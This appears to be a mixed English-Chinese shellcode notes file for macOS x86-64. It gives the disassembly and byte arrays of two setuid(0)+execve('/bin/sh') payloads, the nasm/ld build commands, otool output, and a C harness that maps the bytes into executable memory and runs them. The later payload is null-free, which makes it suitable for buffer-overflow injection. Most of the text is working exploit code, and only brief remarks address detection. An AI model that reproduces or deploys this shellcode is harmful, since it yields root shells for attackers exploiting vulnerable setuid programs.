; Disassembly of the first macOS x86-64 setuid(0) + execve("/bin/sh") payload, loaded at 0x00007ffe50c1d000.
; The syscall numbers carry the macOS BSD-class prefix: 0x2000000 | 0x17 (setuid) and 0x2000000 | 0x3b (execve);
; the _setuid stub in the otool output further down shows the same 0x2000017 immediate.
; Entry assumes rax already holds this code's own base address (set by whatever context jumps here; not shown):
; the "/bin/sh" bytes sit at base+0x21 (see 0x00007ffe50c1d021 below), which is what the add computes.
00007ffe50c1d000 4989C4 mov r12, rax
; r12 = address of "/bin/sh" (base + 0x21)
00007ffe50c1d003 4983C421 add r12, 0x21
; setuid = 0x17 -- note the imm32 encoding B8 17 00 00 02 embeds two 0x00 bytes
00007ffe50c1d007 B817000002 mov eax, 0x2000017
; uid = 0
00007ffe50c1d00c 4831FF xor rdi, rdi
; setuid(0)
00007ffe50c1d00f 0F05 syscall
; execve = 0x3b -- same encoding issue, B8 3B 00 00 02 embeds 0x00 bytes
00007ffe50c1d011 B83B000002 mov eax, 0x200003b
; rdi = address of "/bin/sh"
00007ffe50c1d016 4C89E7 mov rdi, r12
; argv = NULL
00007ffe50c1d019 4831F6 xor rsi, rsi
; envp = NULL
00007ffe50c1d01c 4831D2 xor rdx, rdx
; execve("/bin/sh", 0, 0);  (the original annotation said "/bin/ls"; the string below is "/bin/sh")
00007ffe50c1d01f 0F05 syscall
; Inline path string, NUL-terminated at +0x28. The zero bytes here and in the two mov eax encodings are
; why this variant cannot survive a string-copy overflow (noted below); for analysts, the pair of
; syscall immediates 0x2000017 / 0x200003b followed by "/bin/sh" is the static fingerprint of this payload.
00007ffe50c1d021 db 0x2f ; '/'
00007ffe50c1d022 db 0x62 ; 'b'
00007ffe50c1d023 db 0x69 ; 'i'
00007ffe50c1d024 db 0x6e ; 'n'
00007ffe50c1d025 db 0x2f ; '/'
00007ffe50c1d026 db 0x73 ; 's'
00007ffe50c1d027 db 0x68 ; 'h'
00007ffe50c1d028 db 0x00 ; '.'
char shellcode[] = "\x49\x89\xc4\x49\x83\xc4\x21\xb8\x17\x00\x00\x02\x48\x31\xff" \
"\x0f\x05\xb8\x3b\x00\x00\x02\x4c\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f" \
"\x05\x2f\x62\x69\x6e\x2f\x73\x68\x00";
otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 setuid
➜ Desktop git:(master) ✗ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 setuid
_setuid:
0000000000017948 movl $0x2000017, %eax ## imm = 0x2000017
000000000001794d movq %rcx, %r10
0000000000017950 syscall
0000000000017952 jae 0x1795c
0000000000017954 movq %rax, %rdi
0000000000017957 jmp 0x11c53
000000000001795c retq
000000000001795d nop
000000000001795e nop
000000000001795f nop
这段不能用在缓冲区溢出里面，因为其中含有 0x00 字节（mov eax 立即数的编码和字符串末尾的 db 0x00）：C 字符串复制会在第一个 0x00 处截断。
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
这里有几段好的:
编译改为如下:
/usr/local/bin/nasm -f macho64 setuid_shell_x86_64.asm
ld -static -macosx_version_min 10.9.0 -arch x86_64 setuid_shell_x86_64.o
执行: ./a.out
查看: otool -t a.out
/*
 * 50-byte macOS x86-64 payload (built from setuid_shell_x86_64.asm as shown above).
 * Decoded from the bytes: r8 is assembled to 0x2000017 (setuid) via mov r8b,2 / shl r8,24 / or r8,0x17,
 * edi is zeroed, rax=r8, syscall; then r8 += 0x24 gives 0x200003b (execve), rdx is zeroed,
 * "/bin//sh" is loaded as a single 8-byte immediate and pushed behind a zero qword so rdi -> the
 * path, rsi -> {path, NULL}, and the second syscall runs execve.
 * Unlike the variant above (whose mov eax, imm32 encodings and trailing terminator contain zeros),
 * no byte of this encoding is 0x00.
 * sizeof(shellcode) is 51, not 50: the C string literal appends its own NUL. Any mapping or copy in the
 * harness must be sized from sizeof, not from a hard-coded constant (main below uses 0x22, which was the
 * size of the earlier 34-byte variant and is too small for this one).
 * For defenders: the observable behaviour is setuid(0) immediately followed by execve of /bin//sh from an
 * anonymous executable mapping; the 0x2000017 / 0x200003b syscall numbers are the static fingerprint.
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
"\x0f\x05";
// C测试代码
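/*
 * Test harness: copies the `shellcode` bytes into an anonymous mapping and calls into it.
 *
 * Fixes relative to the original:
 *  - the mapping was sized with a hard-coded 0x22 (the earlier 34-byte variant) while memcpy copied
 *    sizeof(shellcode) (51 bytes for the payload above); both now use sizeof(shellcode);
 *  - the page was requested RWX up front; it is now mapped RW, filled, then flipped to RX with
 *    mprotect, so no writable-and-executable page exists at any point (W^X) -- the same policy a
 *    hardened target enforces, and an RWX anonymous mapping is itself a common detection trigger;
 *  - `sc` is declared locally as a function pointer instead of relying on an undeclared global;
 *  - error paths report via perror and return EXIT_FAILURE rather than exit(-1).
 *
 * argc/argv are unused. Returns 0 only if the payload returns (execve normally never does).
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    /* sizeof includes the C string's terminating NUL; size mapping and copy identically. */
    size_t len = sizeof shellcode;

    void *ptr = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        return EXIT_FAILURE;
    }

    memcpy(ptr, shellcode, len);

    /* Drop write before execute: W^X. */
    if (mprotect(ptr, len, PROT_READ | PROT_EXEC) != 0) {
        perror("mprotect");
        munmap(ptr, len);
        return EXIT_FAILURE;
    }

    /* void* -> function pointer is not portable ISO C; copy the representation explicitly
     * instead of casting so the conversion is visible and warning-free. */
    void (*sc)(void);
    memcpy(&sc, &ptr, sizeof sc);
    sc();

    return 0;
}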